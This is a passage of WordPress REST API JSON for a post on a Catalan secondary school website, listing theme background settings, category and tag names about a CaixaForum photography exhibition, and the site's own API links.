center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,29],"tags":[89,90,86,85,87,88],"class_list":["post-382","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-portada","tag-caixaforum","tag-companys","tag-comunicar","tag-experimentar","tag-exposicio","tag-fotografia"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/382","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=382"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/382\/revisions"}],"predecessor-version":[{"id":3994,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/382\/revisions\/3994"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/383"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=382"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=382"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}